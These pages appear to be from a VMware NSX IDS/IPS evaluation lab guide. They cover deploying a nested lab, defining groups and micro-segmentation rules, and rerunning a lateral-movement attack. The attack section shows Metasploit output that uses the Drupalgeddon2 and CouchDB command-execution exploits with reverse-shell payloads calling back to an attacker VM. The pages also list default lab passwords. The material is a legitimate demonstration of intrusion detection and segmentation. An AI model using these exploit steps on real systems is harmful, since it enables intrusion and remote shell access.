191 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
192 | 
193 | 3. Create another Group with the below parameters. Click Apply when done.
194 | * Name **APP1-APP**
195 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
196 | 4. Create another Group with the below parameters. Click Apply when done.
197 | * Name **APP2-WEB**
198 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
199 | 5. Create another Group with the below parameters. Click Apply when done.
200 | * Name **APP2-APP**
201 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
202 |
203 | 6. Confirm the previously deployed VMs became members of the appropriate groups due to the applied tags. Click **View Members** for the 4 groups you created and confirm:
204 | * Members of **APP1-WEB**: **APP-1-WEB-TIER**
205 | * Members of **APP1-APP**: **APP-1-APP-TIER**.
206 | * Members of **APP2-WEB**: **APP-2-WEB-TIER**
207 | * Members of **APP2-APP**: **APP-2-APP-TIER**.
208 |
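To double-check membership outside the UI, you can also query effective group members through the NSX Policy API. A minimal sketch, assuming the group ID matches its display name (the actual IDs may differ in your environment):

```console
# Hypothetical example: list effective VM members of the APP1-WEB group
$nsx  = "10.114.209.149"   # lab NSX Manager IP from the sample environment
$cred = Get-Credential
(Invoke-RestMethod -Uri "https://$nsx/policy/api/v1/infra/domains/default/groups/APP1-WEB/members/virtual-machines" `
  -Authentication Basic -Credential $cred -SkipCertificateCheck).results | Select-Object display_name
```
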
209 | ***Create a Distributed Firewall Application Category Policy***
210 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
211 | 2. Click on the **Application(1)** Category tab.
212 | 3. Click **ADD POLICY**
213 | 4. Click **New Policy** and change the name of the policy to **APP1 Micro-Segmentation**
214 | 5. Check the checkbox next to the **APP1 Micro-Segmentation** Policy
215 | 6. Click **ADD RULE** twice, and configure the new rules as per the below steps
216 | 7. Rule 1
217 | * Name: **WEB-TIER-ACCESS**
218 | * Source: **Any**
219 | * Destination: **APP1-WEB**
220 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
221 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
222 | * Applied To: **APP1-WEB**
223 | * Action: **Allow**
224 | 8. Rule 2
225 | * Name: **APP-TIER-ACCESS**
226 | * Source: **APP1-WEB**
227 | * Destination: **APP1-APP**
228 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
229 | * Applied To: **APP1-WEB** , **APP1-APP**
230 | * Action: **Allow**
231 | 3. Now that we micro-segmented APP1, let's do the same for APP2. Click **ADD POLICY**
232 | 4. Click **New Policy** and change the name of the policy to **APP2 Micro-Segmentation**
233 | 5. Check the checkbox next to the **APP2 Micro-Segmentation** Policy
234 | 6. Click **ADD RULE** twice, and configure the new rules as per the below steps
235 | 7. Rule 1
236 | * Name: **WEB-TIER-ACCESS**
237 | * Source: **Any**
238 | * Destination: **APP2-WEB**
239 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
240 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
241 | * Applied To: **APP2-WEB**
242 | * Action: **Allow**
243 | 8. Rule 2
244 | * Name: **APP-TIER-ACCESS**
245 | * Source: **APP2-WEB**
246 | * Destination: **APP2-APP**
247 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
248 | * Applied To: **APP2-WEB** , **APP2-APP**
249 | * Action: **Allow**
250 | 9. We now have configured the appropriate allow-list policy for APP1 and APP2. Now we can change the default Distributed Firewall action from **Allow** to **Drop** in order to block all traffic except for the traffic we just allowed for our applications to function.
251 | 10. Click the down arrow next to the **Default Layer3 Section** Policy and change the action of the **Default Layer 3 rule** from **Allow** to **Drop**
252 | 11. Click **PUBLISH** to save and publish your changes.
253 |
254 | 
255 |
256 | ***Open a SSH/Console session to the External VM***
257 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
258 | * Username **vmware**
259 | * Password **VMware1!**
260 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
261 |
262 | ***Run through the lateral attack scenario (again)***
263 |
264 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM**, which will initiate the complete lateral attack scenario without needing any manual Metasploit steps. If you prefer, you can also manually go through these steps (see the chapter on the Lateral Movement Scenario).
265 |
266 | 1. Type **sudo ./attack2.sh** to run the attack scenario
267 |
268 | ```console
269 | vmware@ubuntu:~$ ./attack2.sh
270 | [sudo] password for vmware:
271 |
272 |
273 | Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
274 | EFLAGS: 00010046
275 | eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
276 | esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
277 | ds: 0018 es: 0018 ss: 0018
278 | Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
279 |
280 |
281 | Stack: 90909090990909090990909090
282 | 90909090990909090990909090
283 | 90909090.90909090.90909090
284 | 90909090.90909090.90909090
285 | 90909090.90909090.09090900
286 | 90909090.90909090.09090900
287 | ..........................
288 | cccccccccccccccccccccccccc
289 | cccccccccccccccccccccccccc
290 | ccccccccc.................
291 | cccccccccccccccccccccccccc
292 | cccccccccccccccccccccccccc
293 | .................ccccccccc
294 | cccccccccccccccccccccccccc
295 | cccccccccccccccccccccccccc
296 | ..........................
297 | ffffffffffffffffffffffffff
298 | ffffffff..................
299 | ffffffffffffffffffffffffff
300 | ffffffff..................
301 | ffffffff..................
302 | ffffffff..................
303 |
304 |
305 | Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
306 | Aiee, Killing Interrupt handler
307 | Kernel panic: Attempted to kill the idle task!
308 | In swapper task - not syncing
309 |
310 |
311 | =[ metasploit v5.0.95-dev ]
312 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
313 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
314 | + -- --=[ 7 evasion ]
315 |
316 | Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
317 |
318 | [*] Processing attack2.rc for ERB directives.
319 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
320 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
321 | resource (attack2.rc)> set RHOST 192.168.10.101
322 | RHOST => 192.168.10.101
323 | resource (attack2.rc)> set RPORT 8080
324 | RPORT => 8080
325 | resource (attack2.rc)> exploit -z
326 | [*] Started reverse TCP handler on 10.114.209.151:4444
327 | [*] Exploit completed, but no session was created.
328 | resource (attack2.rc)> route add 192.168.20.0/24 1
329 | [-] Not a session: 1
330 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
331 | [*] Using configured payload linux/x64/shell_reverse_tcp
332 | resource (attack2.rc)> set LPORT 4445
333 | LPORT => 4445
334 | resource (attack2.rc)> set LHOST 10.114.209.151
335 | LHOST => 10.114.209.151
336 | resource (attack2.rc)> set RHOST 192.168.20.100
337 | RHOST => 192.168.20.100
338 | resource (attack2.rc)> exploit -z
339 | [*] Started reverse TCP handler on 10.114.209.151:4445
340 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
341 | [*] Exploit completed, but no session was created.
342 | resource (attack2.rc)> set LPORT 4446
343 | LPORT => 4446
344 | resource (attack2.rc)> set RHOST 192.168.20.101
345 | RHOST => 192.168.20.101
346 | resource (attack2.rc)> exploit -z
347 | [*] Started reverse TCP handler on 10.114.209.151:4446
348 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
349 | [*] Exploit completed, but no session was created.
350 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) >
351 | ```
352 |
353 | 2. Type **sessions -l** to confirm that this time no reverse shell sessions were established.
354 |
355 | ```console
356 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
357 |
358 | Active sessions
359 | ===============
360 |
361 | No active sessions.
362 | ```
363 | > **Note**: The micro-segmentation policy allows the applications to function but reduces the attack surface by preventing any communication to a service that is not explicitly allowed.
364 |
365 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
366 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
367 | 2. Confirm 2 signatures have fired:
368 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
369 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
370 |
371 | 
372 |
373 | > **Note**: While the initial DrupalGeddon exploit has completed, the distributed firewall has prevented the reverse shell from being established from APP-1-WEB-TIER. As a result, the attacker is unable to move laterally in the environment. In addition, you can enable a **detect & prevent** policy once again to ensure the initial exploit is prevented.
374 |
375 | This completes the NSX Distributed IDS/IPS Evaluation and Optional exercises.
376 |
377 | ---
378 |
379 | [***Next Step: 11. Conclusion***](11-Conclusion.md)
380 |
--------------------------------------------------------------------------------
/3.1/docs/11-Conclusion.md:
--------------------------------------------------------------------------------
1 | ## Conclusion
2 | Congratulations, you have now completed the NSX Distributed IDS/IPS lab/evaluation!
3 |
4 | Throughout this process, you should have discovered the unique benefits of having IDS/IPS built into the infrastructure versus bolted-on security controls.
5 | Please reach out to your VMware NSX representative with any feedback you have about the product or about the evaluation process.
6 |
7 | ## Additional Resources
8 | To learn more about the NSX Distributed IDS/IPS, check out the below resources:
9 | * [NSX Distributed IDS/IPS Overview page](https://www.vmware.com/products/nsx-distributed-ids-ips.html)
10 | * [NSX Service Defined Firewall Overview page](https://www.vmware.com/security/internal-firewall.html)
11 | * [Lightboard: Overview of the NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=WUpq1kNfKB8)
12 | * [VMworld 2020: IDS/IPS at the Granularity of a workload and the Scale of the SDDC with NSX](https://www.vmworld.com/en/video-library/video-landing.html?sessionid=1588253233859001YcvN)
13 |
14 |
--------------------------------------------------------------------------------
/3.1/docs/2-CustomizeScript.md:
--------------------------------------------------------------------------------
1 |
2 | ## 2. Customize Deployment Script Variables
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | Before you can run the [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1), you will need to [download](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1) and edit the script, updating a number of variables to match your deployment environment. Details on each section are described below, including the actual values used in my sample lab environment. The variables that need to be adjusted are called out specifically. Other variables can in almost all cases be left at their default values.
6 |
7 | In the example below, I will be using a single /27 subnet (10.114.209.128/27) on a single port-group (VLAN-194), to which all the VMs provisioned by the automation script will be connected. It is expected that you will have a similar configuration, which is the most basic configuration for PoV and testing purposes.
8 |
9 | | Name | IP Address | Function | Default Credentials |
10 | |----------------------------|--------------------------------|------------------------------|------------------------------|
11 | | pov-vcsa | 10.114.209.143 | vCenter Server |administrator@vsphere.local/VMware1! |
12 | | Nested_ESXi_1 | 10.114.209.140 | ESXi |root/VMware1!
13 | | Nested_ESXi_2 | 10.114.209.141 | ESXi |root/VMware1!
14 | | Nested_ESXi_3 | 10.114.209.142 | ESXi |root/VMware1!
15 | | pov-nsx | 10.114.209.149 | NSX-T Manager |admin/VMware1!VMware1!
16 | | pov-nsx-edge | 10.114.209.150 | NSX-T Edge |admin/VMware1!
17 | | T0-uplink | 10.114.209.148 | T0 GW Interface IP |n.a.
18 | | TunnelEndpointGateway | 10.114.209.129 | Existing default GW |n.a.
19 | | T0 Static Default GW | 10.114.209.129 | Existing default GW |n.a.
20 | | TEP Pool | 10.114.209.144-10.114.209.147 | Tunnel Endpoint IPs |n.a.
21 | | External VM | 10.114.209.151 | Attacker (Metasploit) VM |vmware/VMware1!
22 |
23 | > **Note:** The remainder of this page contains the sections and variables within the script that should be modified to match the parameters of your environment. Other sections and variables within the script should be left at their pre-configured defaults.
24 |
25 | This section describes the credentials for your physical environment vCenter Server, into which the nested lab environment will be deployed. Make sure to adjust **all** of the below variables to match your physical environment vCenter:
26 | ```console
27 | # vCenter Server used to deploy vSphere with NSX lab
28 | $VIServer = "vcenter-north.lab.svanveer.pa"
29 | $VIUsername = "administrator@vsphere.local"
30 | $VIPassword = "VMware1!"
31 | ```
32 |
33 | This section describes the location of the files required for deployment. This includes the OVAs for ESXi, NSX Manager and NSX Edge, the extracted bundle for vCenter and OVAs for the external and victim VMs. Update the below variables with the actual **location of the downloaded OVAs/extracted files** on the local machine you run this PowerShell script from
34 |
35 | ```console
36 | # Full Path to both the Nested ESXi 7.0 VA, Extracted VCSA 7.0 ISO, NSX-T OVAs, External and Victim VM OVAs
37 | $NestedESXiApplianceOVA = "C:\Users\stijn\downloads\ESXI\Nested_ESXi7.0_Appliance_Template_v1.ova"
38 | $VCSAInstallerPath = "C:\Users\stijn\downloads\VCSA\VMware-VCSA-all-7.0.0-16189094"
39 | $NSXTManagerOVA = "C:\Users\stijn\downloads\NSXMgr\nsx-unified-appliance-3.0.0.0.0.15946739.ova"
40 | $NSXTEdgeOVA = "C:\Users\stijn\downloads\NSXEdge\nsx-edge-3.0.0.0.0.15946012.ova"
41 | $ExternalVMOVA = "C:\Users\stijn\downloads\Attacker\External-VM.ova"
42 | $VictimVMOVA = "C:\Users\stijn\downloads\Victim\Victim-VM.ova"
43 | ```
44 | > **Note:** The path to the VCSA Installer must be the extracted contents of the ISO
45 |
46 |
47 | This section defines the number of Nested ESXi VMs to deploy along with their associated IP Address(es). The names are merely the display names of the VMs when deployed. At a minimum, you should deploy at least three hosts, but you can always add additional hosts and the script will automatically take care of provisioning them correctly. Adjust the **IP addresses** for the 3 below hosts. For simplicity, these IP addresses should be part of the same Management subnet as the nested vCenter and NSX Manager.
48 | ```console
49 | # Nested ESXi VMs to deploy - Replace IP addresses (nested ESXi VMkernel NICs) to match the assigned subnet in your physical environment
50 | $NestedESXiHostnameToIPs = @{
51 | "Nested_ESXi_1" = "10.114.209.140"
52 | "Nested_ESXi_2" = "10.114.209.141"
53 | "Nested_ESXi_3" = "10.114.209.142"
54 | }
55 | ```
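
The script provisions however many entries exist in this hashtable. For example, to deploy a fourth host you could add one more entry (the name and IP below are illustrative; pick a free IP in the same subnet):

```console
$NestedESXiHostnameToIPs = @{
    "Nested_ESXi_1" = "10.114.209.140"
    "Nested_ESXi_2" = "10.114.209.141"
    "Nested_ESXi_3" = "10.114.209.142"
    "Nested_ESXi_4" = "10.114.209.139"   # illustrative additional host
}
```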
56 |
57 | This section describes the VCSA deployment configuration, such as the VCSA deployment size, networking & SSO configurations. If you have ever used the VCSA CLI Installer, these options should look familiar. Adjust the **IP address** and **Prefix (Subnet Mask Bits)** to match the desired IP address of the nested vCenter. Use the same IP address as the **hostname**, unless you can add an FQDN entry to your DNS server.
58 | ```console
59 | $VCSADeploymentSize = "tiny"
60 | $VCSADisplayName = "pov-vcsa"
61 | $VCSAIPAddress = "10.114.209.143" #Set to the desired IP address
62 | $VCSAHostname = "10.114.209.143" #Use IP if you don't have valid DNS.
63 | $VCSAPrefix = "27" #Set to the appropriate prefix
64 | $VCSASSODomainName = "vsphere.local"
65 | $VCSASSOPassword = "VMware1!"
66 | $VCSARootPassword = "VMware1!"
67 | $VCSASSHEnable = "true"
68 | ```
69 |
70 | This section describes the physical location as well as the generic networking settings applied to the Nested ESXi, VCSA & NSX VMs. The following variables should be defined by users: **VMDatacenter**, **VMCluster**, **VMNetwork** and **VMDatastore**. Replace all the **IP addresses** and **netmasks** with the appropriate values to match your physical environment. For the other values, the defaults are sufficient.
71 | ```console
72 | $VMDatacenter = "PaloAlto-Main" # Existing Datacenter on the Physical vCenter
73 | $VMCluster = "Physical-3" #Existing Cluster in the above Datacenter on the Physical vCenter
74 | $VMNetwork = "VLAN-194" #Existing port-group on the physical host/ to use and connect all deployed workloads (except for victim VMs) to
75 | $VMDatastore = "NFS" #Existing Datastore on the physical host/vCenter
76 | $VMNetmask = "255.255.255.224" #Netmask of the designated existing subnet which will be used to connect all deployed workloads (except for victim VMs) to
77 | $VMGateway = "10.114.209.129" #Existing Gateway allowing lab management components to reach the outside environment
78 | $VMDNS = "10.114.222.70" #Existing DNS server that will be configured on lab management components
79 | $VMNTP = "10.20.145.1" #Existing NTP server that will be configured on lab management components
80 | $VMPassword = "VMware1!"
81 | $VMDomain = "lab.svanveer.pa"
82 | $VMSyslog = "" # Do not set this unless you want to send logs to an existing and reachable Syslog collector/SIEM.
83 | $VMFolder = "NSX PoV" #The deployment script will create this folder
84 | ```
85 |
86 | This section describes the NSX-T configuration. The following variables must be defined by users and the rest can be left as defaults:
87 | **$NSXLicenseKey**, **$NSXVTEPNetwork**, **$T0GatewayInterfaceAddress**, **$T0GatewayInterfacePrefix**, **$T0GatewayInterfaceStaticRouteAddress** and the **NSX-T Manager**, **TEP IP Pool** and **Edge** sections
88 | ```console
89 | # NSX-T Configuration - Adjust variables (license key, VTEPNetwork) to match your environment
90 | $NSXLicenseKey = "xxxxx-xxxxx-xxxxx-xxxxx-xxxxx" #Replace with valid NSX License key
91 | $NSXRootPassword = "VMware1!VMware1!"
92 | $NSXAdminUsername = "admin"
93 | $NSXAdminPassword = "VMware1!VMware1!"
94 | $NSXAuditUsername = "audit"
95 | $NSXAuditPassword = "VMware1!VMware1!"
96 | $NSXSSHEnable = "true"
97 | $NSXEnableRootLogin = "true"
98 | $NSXVTEPNetwork = "VLAN-194" # Replace with the appropriate pre-existing port-group
99 |
100 | # TEP IP Pool - Replace IP addresses to match the physical environment subnet you've allocated (i.e management network)
101 | $TunnelEndpointName = "TEP-IP-Pool"
102 | $TunnelEndpointDescription = "Tunnel Endpoint for Transport Nodes"
103 | $TunnelEndpointIPRangeStart = "10.114.209.144"
104 | $TunnelEndpointIPRangeEnd = "10.114.209.147"
105 | $TunnelEndpointCIDR = "10.114.209.128/27"
106 | $TunnelEndpointGateway = "10.114.209.129" #Default Gateway of the Management Network
107 |
108 | # T0 Gateway - Adjust T0GatewayInterfaceAddress and Prefix as well as StaticRoute Address
109 | $T0GatewayName = "PoV-T0-Gateway"
110 | $T0GatewayInterfaceAddress = "10.114.209.148" # should be a routable address
111 | $T0GatewayInterfacePrefix = "27" #adjust to the correct prefix for your environment
112 | $T0GatewayInterfaceStaticRouteName = "PoV-Static-Route"
113 | $T0GatewayInterfaceStaticRouteNetwork = "0.0.0.0/0"
114 | $T0GatewayInterfaceStaticRouteAddress = "10.114.209.129" # IP address of the next hop router in your environment. This can be set to an invalid IP address to ensure the vulnerable workloads remain isolated from the rest of the environment
115 |
116 | # NSX-T Manager Configurations - Replace IP addresses
117 | $NSXTMgrDeploymentSize = "small"
118 | $NSXTMgrvCPU = "4"
119 | $NSXTMgrvMEM = "16"
120 | $NSXTMgrDisplayName = "pov-nsx-manager"
121 | $NSXTMgrHostname = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
122 | $NSXTMgrIPAddress = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
123 |
124 | # NSX-T Edge Configuration
125 | $NSXTEdgeDeploymentSize = "medium"
126 | $NSXTEdgevCPU = "4"
127 | $NSXTEdgevMEM = "8"
128 | $NSXTEdgeName = "poc-nsx-edge"
129 | $NSXTEdgeHostnameToIPs = @{
130 | $NSXTEdgeName = "10.114.209.150" #Replace with the desired IP address for the NSX Edge Management Interface
131 |
132 | }
133 | ```
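
Before kicking off the full deployment, it can save time to sanity-check the physical vCenter credentials and file paths you just configured. A minimal sketch, assuming the variable assignments above have been loaded into your PowerShell session:

```console
# Confirm the physical vCenter is reachable with the configured credentials
Connect-VIServer -Server $VIServer -User $VIUsername -Password $VIPassword

# Confirm the target datacenter, cluster and datastore exist
Get-Datacenter -Name $VMDatacenter
Get-Cluster -Name $VMCluster
Get-Datastore -Name $VMDatastore

# Confirm the OVA/installer paths resolve on this machine
$NestedESXiApplianceOVA, $VCSAInstallerPath, $NSXTManagerOVA, $NSXTEdgeOVA,
$ExternalVMOVA, $VictimVMOVA | ForEach-Object { "{0} : {1}" -f $_, (Test-Path $_) }

Disconnect-VIServer -Server $VIServer -Confirm:$false
```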
134 |
135 | ---
136 | [***Next Step: 3. Run Deployment Script***](3-RunScript.md)
137 |
--------------------------------------------------------------------------------
/3.1/docs/3-RunScript.md:
--------------------------------------------------------------------------------
1 | ## 3. Run Deployment Script
2 | **Estimated Time to Complete: 90 minutes**
3 | Once you have saved your changes, you can now run the PowerCLI script as you normally would.
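
For example, from a PowerShell Core session in the directory where you saved the script (the file name contains spaces, so it must be quoted and invoked with the call operator):

```console
PS /home/user/nsx-pov> & './Nested Lab Deployment-3.1.ps1'
```

The prompt above is illustrative; any PowerShell Core session with PowerCLI installed will do.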
4 |
5 | Here is a screenshot of running the script if all basic pre-reqs have been met and the confirmation message before starting the deployment:
6 | 
7 |
8 | Once the deployment completes, you will receive a confirmation and can now move on with the next step:
9 | 
10 |
11 |
12 | > **Note**: Deployment time will vary based on the underlying physical infrastructure resources. On average, it can take between 45 and 90 minutes.
13 |
14 | ---
15 |
16 | [***Next Step: 4. Verify Lab Deployment***](4-VerifyDeployment.md)
17 |
--------------------------------------------------------------------------------
/3.1/docs/4-VerifyDeployment.md:
--------------------------------------------------------------------------------
1 |
2 | ## 4. Verify Lab Deployment
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | Once the deployment script has completed the installation and setup process, your lab environment is fully ready to start testing the NSX Distributed IDS/IPS. Verify that vCenter and NSX have been configured as intended.
6 |
7 | **Physical Infrastructure Host/vCenter**
8 |
9 | 
10 |
11 | **Logical Nested Lab**
12 | 
13 |
14 | **Validate VM Deployment in the physical Environment**
15 |
16 | Login to the physical environment vCenter and verify 6 VMs have been deployed, are up and running, and are connected to the appropriate port-group:
17 | * 3 nested ESXI
18 | * 1 NSX Manager
19 | * 1 NSX Edge
20 | * 1 vCenter
21 | * 1 External VM
22 |
23 | 
24 |
25 | Confirm you are able to ping each nested ESXi, the Lab NSX Manager and the Lab vCenter.
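
A quick way to check this from the same PowerShell session, using the sample IP addresses from the earlier table (substitute your own):

```console
# Ping the nested ESXi hosts, the lab NSX Manager and the lab vCenter (sample IPs)
"10.114.209.140","10.114.209.141","10.114.209.142","10.114.209.149","10.114.209.143" |
  ForEach-Object { Test-Connection $_ -Count 2 }
```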
26 |
27 | **Configure IP address and static route on the External VM**
28 |
29 | 
30 |
31 | You will need to manually change the IP address of the external VM to an IP address in the same management subnet you used for vCenter/NSX Manager and the rest of the environment. You will also need to adjust the static route so the external VM is able to reach the DMZ subnet inside the nested lab environment. There is no need for a default gateway to be configured, as the only route the external VM needs is to the DMZ segment.
32 |
33 | From the physical environment vCenter, open a console to the **External VM** and take the following steps:
34 | * Login with **vmware**/**VMware1!**
35 | * Type **sudo nano /etc/network/interfaces** to open the network configuration file
36 | 
37 | * For interface **ens160**, change the **address** and **netmask** to match the appropriate settings for your environment
38 | * In the line that starts with **up route add**, change the **gw address** (10.114.209.148 in my example) to the **T0 Uplink interface IP address** (see the example after these steps)
39 | * Type **^O** (**Control-O**) to save the changes in Nano.
40 | * Type **^X** (**Control-X**) to exit Nano.
41 | * Type **sudo ip addr flush ens160** to clear the previously set IP address
42 | * Type **sudo systemctl restart networking.service** to restart the networking service and apply the new IP address.
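For reference, below is a minimal sketch of what the relevant part of **/etc/network/interfaces** might look like after your edits, using this guide's example addresses (10.114.209.151 for the External VM, 10.114.209.148 for the T0 Uplink, 192.168.10.0/24 for the DMZ subnet); adjust every value to your environment:

```console
# Static configuration for the management-facing interface (example values)
auto ens160
iface ens160 inet static
  address 10.114.209.151
  netmask 255.255.255.0
  # Static route to the nested DMZ segment via the T0 Uplink; no default gateway needed
  up route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.114.209.148
```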
43 |
44 | **Verify Nested Lab vCenter**
45 |
46 | Login to lab vCenter and verify the cluster of 3 nested ESXi appliances is functional and 4 vulnerable VMs have been deployed on the cluster:
47 | * APP-1-WEB-TIER connected to **DMZSegment** Portgroup
48 | * APP-2-WEB-TIER connected to **DMZSegment** Portgroup
49 | * APP-1-APP-TIER connected to **InternalSegment** Portgroup
50 | * APP-2-APP-TIER connected to **InternalSegment** Portgroup
51 |
52 | 
53 |
54 | **Verify Network Segments were created**
55 |
56 | 1. Login to the Lab NSX Manager Web-UI.
57 | 2. In the NSX Manager UI, navigate to Networking --> Segments --> Segments
58 | 3. Verify 3 segments have been deployed
59 | * **DMZSegment** - Overlay-based segment connecting the Web-tier workloads
60 | * **InternalSegment** - Overlay-based segment connecting the App-tier workloads
61 | * **PoC-Segment** - VLAN-backed segment providing uplink and management connectivity
62 |
63 | 
64 |
65 | **Determine the IP address of every nested workload**
66 |
67 | 1. In the NSX Manager UI, navigate to Inventory --> Virtual Machines
68 | 2. Click **View Details**
69 | 3. Note the IP addresses for the 4 VMs that were deployed. You will need to know which IP address has been assigned to each workload in the next exercises.
70 |
71 | 
72 | 
73 |
74 | > **Note**: DHCP Server has been pre-configured on NSX and should be assigning an IP address to each of the deployed nested workloads on the DMZ and Internal segments.
75 |
76 |
77 | **Confirm NAT configuration**
78 |
79 | 
80 |
81 | 1. In the NSX Manager UI, navigate to Networking --> NAT
82 | 2. Confirm a single **SNAT** rule exists, with the **Internal Subnet** as a source, and the **T0 Uplink** IP address as the translated address (10.114.209.148 in my example).
83 |
84 | 
85 |
86 | > **Note**: This NAT rule enables internal VMs to initiate communication with the outside world.
87 |
88 |
89 | **Confirm TAG Creation and Application**
90 |
91 | 
92 |
93 | 1. In the NSX Manager UI, navigate to Inventory --> Tags
94 | 2. Confirm 6 tags have been added as per the below screenshot
95 | 
96 | 3. Confirm tags were applied to workloads as per the above diagram
97 |
98 | This completes Lab Deployment Verification. You can now move to the next exercise.
99 |
100 | ---
101 |
102 | [***Next Step: 5. Initial IDS/IPS Configuration***](5-InitialConfiguration.md)
103 |
--------------------------------------------------------------------------------
/3.1/docs/5-InitialConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 5. Initial IDS/IPS Configuration
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | > **Note**: If you are running through this Evaluation process using a VMware-hosted (OneCloud/HoL) environment, you can skip all the previous modules and start with this lab module (5), as everything has already been deployed.
7 |
8 | Now that we have verified the lab has been deployed correctly, basic NSX networking configuration has been applied, and the appropriate vulnerable application VMs have been deployed, we can configure the NSX Distributed IDS/IPS.
9 |
10 | **Create Groups**
11 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
12 | 2. Click **ADD GROUP**
13 | 3. Create a Group with the below parameters. Click Save when done.
14 | * Name **Production Applications**
15 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Production Scope Environment**
16 | 
17 | 4. Create another Group with the below parameters. Click Save when done.
18 | * Name **Development Applications**
19 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Development Scope Environment**
20 | 5. Create another Group with the below parameters. Click Save when done.
21 | * Name **Web-Tier**
22 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Web-Tier Scope Tier**
23 | 6. Create another Group with the below parameters. Click Save when done.
24 | * Name **App-Tier**
25 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals App-Tier Scope Tier**
26 | 
27 |
28 | 7. Confirm the previously deployed VMs became members of the appropriate groups based on the applied tags. Click **View Members** for each of the 4 groups you created and confirm:
29 | * Members of **Development Applications**: **APP-2-APP-TIER**, **APP-2-WEB-TIER**
30 | * Members of **Production Applications**: **APP-1-APP-TIER**, **APP-1-WEB-TIER**
31 | * Members of **Web-Tier**: **APP-1-WEB-TIER**, **APP-2-WEB-TIER**
32 | * Members of **App-Tier**: **APP-1-APP-TIER**, **APP-2-APP-TIER**
33 | 
34 |
35 | > **Note**: Tags were applied to the workloads through the Powershell script used to deploy the lab environment.
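If you want to automate this step, the same groups can also be created through the NSX Policy API. Below is a hedged sketch for the **Production Applications** group; the group ID in the URL is an arbitrary choice, the NSX Manager address is this guide's example, and the tag condition uses NSX's scope|tag convention (scope **Environment**, tag **Production**):

```console
curl -k -u admin -X PATCH \
  -H "Content-Type: application/json" \
  -d '{
        "display_name": "Production Applications",
        "expression": [{
          "resource_type": "Condition",
          "member_type": "VirtualMachine",
          "key": "Tag",
          "operator": "EQUALS",
          "value": "Environment|Production"
        }]
      }' \
  "https://10.114.209.149/policy/api/v1/infra/domains/default/groups/Production-Applications"
```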
36 |
37 | **Apply Evaluation License or ATP license**
38 |
39 | If you used the deployment script to deploy your own nested environment and previously provided an NSX Evaluation license key (which enables all functionality, including IDS/IPS), or if the required license is already present, you can skip this step.
40 | 1. In the NSX Manager UI, navigate to System --> License and upload either an ATP subscription license or an evaluation license
41 | 2. Click **+ADD LICENSE**
42 | 3. Enter a valid license key and click **ADD**
43 |
44 |
45 | **Enable Intrusion Detection**
46 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Settings
47 | 2. Under Enable Intrusion Detection for Cluster(s), change the toggle to **enabled** for the workload cluster
48 |
49 | 
50 |
